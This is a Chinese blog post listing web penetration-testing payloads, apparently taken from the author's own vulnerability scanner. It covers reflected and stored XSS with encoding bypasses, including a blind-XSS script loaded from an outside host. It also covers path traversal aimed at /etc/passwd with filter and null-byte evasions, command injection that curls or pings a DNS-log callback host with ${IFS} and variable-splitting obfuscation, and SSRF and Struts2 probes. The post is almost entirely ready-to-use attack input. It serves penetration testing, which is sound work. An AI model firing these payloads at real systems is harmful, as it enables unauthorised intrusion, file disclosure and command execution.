web渗透测试常用payload

常用web漏洞测试的payload整理,把写的一个类sqlmap的web安全漏洞测试工具的Payload整理下来,供大家测试时参考。

[反射型xss]

[在html形成]
  1. "'><script>document.title="[random]";</script>
  2. <script>document.title="[random]";</script>
  3. <svg onload=document.title="[random]";>

[在js形成]
  1. document.title= "[random]"; //
  2. ; document.title= "[random]"; //
  3. ";document.title="[random] ";
  4. ';document.title="[random] ";
  5. "); document.title= "[random]";
  6. ');document.title="[random]";


[在html属性形成(img)]
  1. 888 " onload=document.title="[random] " a="
  2. 888 ' onload=document.title="[random]" a='
  3. 888 onload= document.title= "[random]"

[存储型xss]
[通用payload]

测试环境,需要在触发的地方查看payload显示情况

  1. <script>alert( /StoredXssByScriptTag/); </script>
  2. "'><script>alert(/StoredXssByScriptTagBypass);</script>
  3. [Bypass on Event] [事件型绕过]
  4. <img src=1 onerror=alert(/StoredXssByImgTag/)> #一般富文本不会过滤img标签
  5. [Bypass pseudo protocol] [伪协议绕过]
  6. <iframe src=javascript:prompt(/StoredXssByIframeTag/);></iframe>
  7. <object data=data:text/html;base64,PHNjcmlwdD5wcm9tcHQoL1N0b3JlZFhzc0J5T2JqZWN0VGFnLyk7PC9zY3JpcHQ+></object>
  8. [Bypass html5 tag] [html5标签绕过]
  9. <svg onload=prompt(/StoredXssBySvgTag/)>
  10. <embed src=javascript:alert(/StoredXssByEmbedTag/);>
  11. [Bypass html or js encode] [js编码,html编码,十进制编码绕过等]
  12. <embed src=javas&#99;r&#105;pt:alert(/StoredXssByEmbedTagAndHtmlEncode/);>
  13. <video><source onerror=alert(String.fromCharCode(47,83,116,111,114,101,100,88,115,115,98,121,86,105,100,101,111,84,97,103,65,110,100,83,116,114,105,110,103,69,110,99,111,100,101,47))>
  14. <script/src=data:text/j\141v\141script,\u0061%6C%65%72%74(/StoredXssbyScriptTagAndJSEncode/)></script>
  15. 如果进行盲测可以根据xss平台地址替换相应的js触发代码
  16. "> <script src=http://myxss.net/xxxxxx> </script>



[静态文件读取]
  1. [常规检测]
  2. /../../../../../../../../../../../etc/passwd
  3. /../../../../../../../../../../../etc/hosts
  4. /../../../../../../../C: /Windows/system.ini [windows]
  5. [伪造绕过]
  6. /././././././././././././././././././././././././../../../../../../../../etc/passwd
  7. /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
  8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
  9. /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
  10. /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd
  11. /%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/hosts


[后缀绕过]
  1. /../../../../../../../../../../../etc/passwd #
  2. /../../../../../../../../../../../etc/passwd%00
  3. /../../../../../../../../../../../etc/passwd #.jpg
  4. /../../../../../../../../../../../etc/passwd%00.jpg
  5. /../../../../../../../../../../../etc/passwd #.html
  6. /../../../../../../../../../../../etc/passwd%00.html
  7. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #
  8. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.jpg
  9. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd #.html
  10. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.jpg
  11. /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd%00.html


[命令执行漏洞]
  1. [常规检测]
  2. ;curl [random].test.dnslog.link
  3. | curl [random].test.dnslog.link
  4. | ping -n 2 [random].test.dnslog.link [Windows]
  5. | ping -c 2 [random].test.dnslog.link [Linux]
  6. [绕过检测]
  7. ;curl [random].test.dnslog.link #
  8. | curl [random].test.dnslog.link #
  9. %20|%20curl%20[random].test.dnslog.link
  10. %20|%20curl%20[random].test.dnslog.link #
  11. %20|%20ping%20-n%202%20[random].test.dnslog.link
  12. %20|%20ping%20-c%202%20[random].test.dnslog.link #
  13. a=p;b=ing;c=c;d= 2;$a$b -$c $d [random].test.dnslog.link
  14. a=c;b=url;$a$b [random].test.dnslog.link #
  15. ${IFS}|${IFS}curl${IFS}[random].test.dnslog.link
  16. ${IFS}|${IFS}ping${IFS}-c${IFS} 2${IFS}[random].test.dnslog.link
  17. a=p;b=ing;c=c;d= 2;$a$b {IFS}-$c {IFS}$d {IFS}[random].test.dnslog.link
  18. a=c;b=url;$a$b {IFS}[random].test.dnslog.link #


[ssrf漏洞]
http://[random].test.dnslog.link/


[strust2命令执行]
?redirect:http://[random].test.dnslog.link/%25{3*4}

猜你喜欢

转载自blog.csdn.net/sun8890446/article/details/80975385
今日推荐